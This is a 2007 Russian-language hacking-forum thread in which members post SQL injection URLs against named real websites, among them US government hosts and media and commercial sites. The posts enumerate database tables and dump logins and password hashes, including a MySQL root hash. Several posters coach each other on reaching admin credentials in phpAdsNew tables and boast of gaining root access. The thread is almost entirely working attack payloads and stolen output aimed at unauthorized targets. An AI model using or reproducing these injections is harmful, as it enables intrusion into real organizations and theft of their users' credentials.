ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
22.09.2007, 18:23
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
Сообщение от _-Ramos-_
www.chip.ua - сайт журнала CHIP
Код:
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Скуль так розкрутить не удалось =\
P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тот же результат =)
все таблички:
Код:
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES/*
все колонки:
Код:
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13+from+INFOrMATION_SCHEMA.COLUMNS/*
|
|
|
22.09.2007, 17:56
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
Google Page Rank 8/10
WebAlta WTR 9/10
4-ая версия..
логин+пароль:
Код:
http://www.mnogosearch.org/bugs/bugs.php?id=-1+union+select+1,2,pass,4,5,6,7,8,9,user,11,12,13,14,15,16+from+user/*
логин:
bar
хэш пасса:
948f878a52bb69d5e54fe8d04dcddfd5
Последний раз редактировалось BlackCats; 22.09.2007 в 18:08..
|
|
|
|
22.09.2007, 17:59
|
|
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904
Репутация:
1393
|
|
Код:
http://www.concertseries.org/index.php?page=-1+union+select+0,1,2,3,4,version(),user(),7,8,9,10,11,12,13,15,17,18,19,20/*
|
|
|
|
22.09.2007, 19:00
|
|
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904
Репутация:
1393
|
|
Код:
http://www.sbinstitute.com/news.php?id=-1+union+select+0,concat(user,char(58),password),user,3,4+from+mysql.user/*
root:18846f503afd5707
Второй рут за сегодня )
К сожаленью пасс расшифровать не удалось ( |
|
|
|
23.09.2007, 16:36
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Mssql+gov
MSSQL+GOV
tms.apps.em.doe.gov
Код:
http://tms.apps.em.doe.gov/current/ost/Review/TkRvTASLi.asp?ApplicationID=-1+or+1=@@version--
http://tms.apps.em.doe.gov/current/ost/Review/TkRvTASLi.asp?ApplicationID=-1+or+1=(select+system_user)--
www.workforcekentucky.ky.gov
Код:
http://www.workforcekentucky.ky.gov/cgi/dataanalysis/cesReport.asp?tableName=CES&dataColumns=earnings%2C+empces%2C+hourearn%2C+hours%2C+empprodwrk&ID=-1+or+1=@@version--
http://www.workforcekentucky.ky.gov/cgi/dataanalysis/cesReport.asp?tableName=CES&dataColumns=earnings%2C+empces%2C+hourearn%2C+hours%2C+empprodwrk&ID=-1+or+1=(select+system_user)--
www3.fmc.gov
Код:
http://www3.fmc.gov/btaagmnts/amend_func2_npage.asp?agmtnum=-1'+or+1=@@version--
http://www3.fmc.gov/btaagmnts/amend_func2_npage.asp?agmtnum=123'+union+select+1,system_user,3,4--
кому интересно дальше ройте...
|
|
|
|
23.09.2007, 16:48
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Код:
http://www.captains-club.ru/index.php?id=110%20union%20select%201,2,COLUMN_NAME,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.COLUMNS/*
Код:
http://www.captains-club.ru/index.php?id=110%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.TABLES/*
Код:
http://www.avvakul.ru/index.php?id=2&p=6&tid=60%20union%20select%201,TABLE_NAME,3,4,5%20fro m%20INFORMATION_SCHEMA.TABLES/*
Код:
http://www.avvakul.ru/index.php?id=2&p=6&tid=60%20union%20select%201,COLUMN_NAME,3,4,5%20fr om%20INFORMATION_SCHEMA.COLUMNS/*
Код:
http://www.vipsoft.by/index.php?id=200%20union%20select%201,TABLE_NAME,3%20from%20INFORMATION_SCHEMA.TABLES/*
Код:
http://www.vipsoft.by/index.php?id=200%20union%20select%201,COLUMN_NAME,3%20from%20INFORMATION_SCHEMA.COLUMNS/*
Последний раз редактировалось kair; 23.09.2007 в 17:09..
|
|
|
|
23.09.2007, 17:14
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
интересная скуля
код:
http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,concat_ws(0x3a,table_name,colu mn_name),4+from+information_schema.columns/*
жаль незнаю как добиться вывода инфы,на все запросы к бд выдает такую ошибку :
1146 - Table 'webtelek_com.xxx_xxx' doesn't exist
select image_url, display_name, description, pvr_status from channel where connectv_id is not null and products_id = '-0' union select 1,2,concat_ws
(0x3a,clientname,clientpassword),4 from phpads_clients/*' and (pvr_status IS NULL OR pvr_status='N' OR pvr_status <> 'X') order by rank
[TEP STOP]
разъясните ламеру,кому не лень 
спасибо [53X]Shadowкод:
http://www.webtelek.com/includes/products_view.php?pid=-0+'union+select+1,2,concat_ws(0x3a,username,user_p assword,user_icq,user_email),4+from+phpbb.phpbb_us ers/*
Последний раз редактировалось fobofob; 23.09.2007 в 18:00..
|
|
|
|
23.09.2007, 17:38
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от fobofob
интересная скуля
код:
http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,concat_ws(0x3a,table_name,colu mn_name),4+from+information_schema.columns/*
жаль незнаю как добиться вывода инфы,на все запросы к бд выдает такую ошибку :
1146 - Table 'webtelek_com.xxx_xxx' doesn't exist
select image_url, display_name, description, pvr_status from channel where connectv_id is not null and products_id = '-0' union select 1,2,concat_ws
(0x3a,clientname,clientpassword),4 from phpads_clients/*' and (pvr_status IS NULL OR pvr_status='N' OR pvr_status <> 'X') order by rank
[TEP STOP]
разъясните ламеру,кому не лень Ты не ту схему(базу данных юзаешь) для phpads_clients
сначала выясняем имя бд вот так
Код:
http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,table_schema,4+from+information_schema.tables+where+table_name='phpads_clients'/*
а затем через точку делаем запрос к нужной таблице
Код:
http://www.webtelek.com/includes/products_view.php?pid=-0%20'union%20select%201,2,concat_ws(0x3a,clientname,clientpassword),4%20from%20phpads.phpads_clients/*
подробнее здесь:
https://forum.antichat.ru/showpost.php?p=442627&postcount=26
Последний раз редактировалось [53x]Shadow; 23.09.2007 в 17:44..
|
|
|
|
23.09.2007, 17:44
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
[53x]Shadow,fobofob в таблице phpds_clients ничего интересного не найдете. По умолчанию в таблице phpads_config содержаться логины и мд5 хеши паролей админов, колонки admin,admin _pw
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 23.09.2007 в 17:48..
|
|
|
|
23.09.2007, 17:50
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от Constantine
[53x]Shadow,fobofob в таблице phpds_clients ничего интересного не найдете. По умолчанию в таблице phpads_config содержаться логины и мд5 хеши паролей админов, колонки admin,admin _pw
Хм.. я в принципе там ничего и не искал, просто объяснил человеку где ошибка, но в принципе в phpads_config только имя и хеш админа, а в phpads_clients дофига разных хешей =)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?466343){kind=avatar}
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?466421){kind=avatar}
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?466436){kind=avatar}
Комбинированный вид
